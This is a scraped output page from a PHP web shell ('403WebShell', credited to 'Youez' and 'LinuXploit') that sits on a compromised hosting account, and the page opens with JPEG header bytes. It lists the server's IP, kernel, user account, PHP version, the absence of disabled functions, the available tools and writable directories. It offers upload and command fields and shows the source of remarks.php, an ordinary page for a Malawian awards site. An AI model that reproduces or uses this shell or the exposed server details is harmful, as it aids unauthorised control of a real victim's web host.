����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 18.191.91.15
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/maso-awards.live/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/maso-awards.live/remarks.php
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/icomoon/style.css">
    <link rel="stylesheet" href="./css/bootstrap.min.css">
    <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
    <link rel="stylesheet" href="./css/main.css">
    <link rel="stylesheet" href="./css/animate.css" type="text/css">
    <link rel="shortcut icon" href="./assets/img/maso.png" type="image/png">
    <link href="assets/css/style.css" rel="stylesheet">

    <script src="./js/countdown.js"></script>
    <script src="./js/jquery-3.3.1.min.js"></script>

    <title>Maso Awards - Remarks</title>

    <!--og codes-->
    <meta property="og:url" content="https://www.maso-awards.com/nominate.php" />
    <meta property="og:type" content="website" />
    <meta property="og:title" content="<?php echo "MASO AWARDS " . date('Y'); ?>" />
    <meta property="og:image" content="https://maso-awards.live/assets/img/maso-og.jpg" />
    <meta property="og:description" content="Thank For Voting" />
    <meta property="fb:app_id" content="197362031139140" />

    <style>
        .side-menu a:hover {
            background-color: #000;
            color: #fff;
        }
    </style>
</head>

<body>

    <div class="vote">
        <!-- Background -->
        <div class="bg">
        </div>
        <div class="timer-overlay"></div>
        <div class="container-fluid">
            <div class="row d-flex justify-content-center">
                <div class="col-12">
                    <img src="./images/final-poster.jpg" style="width:100%;height:auto;margin:1rem auto;border-radius:20px;box-shadow:0 0 7px 3px rgba(146, 143, 143, 0.2)" alt="">
                </div>
                <div class="col-12">
                    <audio id="myAudio" preload="auto" hidden>
                        <source src="images/advert.mp3" type="audio/mp3">
                        Your browser does not support the audio element.
                    </audio>
                </div>
            </div>
        </div>
        <div class="container-fluid footer-menu">
            <div class="row">
                <div class="col text-center">
                    <div class="d-flex justify-content-around">
                        <a href="home" class="mx-2">
                            <i class="fas fa-home icon"></i>
                            <div>Home</div>
                        </a>
                        <a href="vote" class="mx-2 active">
                            <i class="fas fa-th-list icon"></i>
                            <div>Categories</div>
                        </a>
                        <a href="buy-ticket" class="mx-2">
                            <i class="fas fa-ticket-alt icon"></i>
                            <div>Tickets</div>
                        </a>
                        <a href="donate" class="mx-2">
                            <i class="fas fa-hand-holding-heart icon"></i>
                            <div>Donate</div>
                        </a>
                    </div>
                </div>
            </div>
        </div>

        <!-- ======= Footer ======= -->
        <footer id="footer">
            <div class="footer-top">
                <div class="container-fluid">
                    <div class="row">
                        <div class="col-lg-4 col-md-6 footer-links">
                            <h4>Useful Links</h4>
                            <ul>
                                <li><i class="bi bi-chevron-right"></i> <a href="#">About Us</a></li>
                                <li><i class="bi bi-chevron-right"></i> <a href="#hotels">News</a></li>
                                <li><i class="bi bi-chevron-right"></i> <a href="buy-ticket">Buy Ticket</a></li>
                                <li><i class="bi bi-chevron-right"></i> <a href="#">Vote</a></li>
                            </ul>
                        </div>

                        <div class="col-lg-4 col-md-6 footer-info">
                            <img src="assets/img/maso.png" alt="TheEvenet">
                        </div>

                        <div class="col-lg-4 col-md-6 footer-contact">
                            <h4>Contact Us</h4>
                            <p>
                                Chichiri<br>
                                Blantyre<br>
                                Malawi <br>
                                <strong>Phone:</strong> +265 884 41 21 72 / +265 994 61 91 94<br>
                                <strong>Email:</strong> info@maso-awards.live<br>
                            </p>

                            <div class="social-links">
                                <a href="#" class="twitter"><i class="bi bi-twitter"></i></a>
                                <a href="#" class="facebook"><i class="bi bi-facebook"></i></a>
                                <a href="#" class="instagram"><i class="bi bi-instagram"></i></a>
                                <a href="#" class="google-plus"><i class="bi bi-instagram"></i></a>
                                <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="copyright">
                    &copy; Copyright <strong>MASO Awards</strong>. All Rights Reserved
                </div>
            </div>
        </footer><!-- End  Footer -->
        <div class="footer-tolerance"></div>
    </div>
    <!-- ATTACH COUNTDOWN TIMER -->
    <script>
        //Disable specific keyboard shortcuts
        // document.addEventListener('keydown', (e) => {
        //     if (e.ctrlKey && (e.key === 'u' || e.key === 'U' || e.key === 'i' || e.key === 'I')) {
        //         e.preventDefault();
        //     }
        // });

        // // Disable right-click context menu
        // document.addEventListener('contextmenu', function(event) {
        //     event.preventDefault();
        // });
    </script>
    <script>
        // JavaScript to autoplay audio when the page is loaded
        window.onload = function() {
            // Get the audio element by its ID
            var audio = document.getElementById("myAudio");

            // Play the audio file
            audio.play().catch(function(error) {
                // Handle any errors that may occur (e.g., autoplay restrictions)
                console.log("Audio play failed:", error);
            });
        };
    </script>
</body>
<script src="./js/all.min.js"></script>
<script src="./js/wow.min.js"></script>
<script src="./js/bootstrap.min.js"></script>
<script type="text/javascript">
    new WOW().init();
</script>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit